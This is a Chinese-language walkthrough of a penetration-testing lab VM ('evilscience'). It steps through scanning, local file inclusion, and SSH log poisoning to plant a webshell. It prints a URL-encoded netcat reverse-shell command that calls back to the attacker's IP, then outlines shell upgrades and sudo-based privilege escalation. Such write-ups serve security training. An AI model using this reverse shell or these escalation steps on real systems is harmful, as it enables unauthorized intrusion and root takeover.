kali滲透綜合靶機(十六)--evilscience靶機
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24

二、端口掃描
1. masscan --rate=10000 -p0-65535 192.168.10.195

三、端口服務識別
1. nmap -sV -T4 -O -p 22,80 192.168.10.195

四、漏洞查找與利用
1.目錄掃描

2. 發現http://192.168.10.195/fuck,下載下來沒啥用
3.發現http://192.168.10.195/index.php?file=about.php 測試存在本地文件包含

4.包含/etc/passwd,失敗,嘗試用burp進行模糊測試,可以看到可以包含/var/log/auth.log文件,可以利用ssh登錄產生錯誤日志

5. 利用ssh登錄產生錯誤日志,可以看到錯誤信息寫入到日志中,可以利用ssh錯誤日志寫入一句話木馬


6.利用ssh日志寫入一句話木馬

7.測試一句話是否成功寫入,下圖可以看到成功執行,然后可以執行任何系統命令

8.反彈shell,需要對反彈shell中特殊符號進行url編碼,不要對整個url進行編碼
mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

9.kali端開啟監聽,然后用python -c ‘import pty;pty.spawn(“/bin/bash”)’,重新打開一個終端

10.上圖看到用python -c 打開的一個終端還是受限的,需要在用awk ‘BEGIN{system(“/bin/bash”)}’重新打開一個終端
提權一:
1.Sudo -l查看是否屬於sudo組

2. 可以使用sudo權限不需要密碼執行xxxlogauditorxxx.py,查看一下該文件的權限, 該py文件的配置錯誤,導致可以直接以root權限執行命令,查看腳本存在命令執行漏洞

3.msfvenom生成一個payload,上傳到目標,增加執行權限

4.sudo運行該腳本,

5.kali開啟監聽

提權二:
1.首先給/etc/sudoers加寫入權限

2.然后把當前用戶以不用密碼的登錄方式添加到sudo組

3.sudo -i 獲得root權限

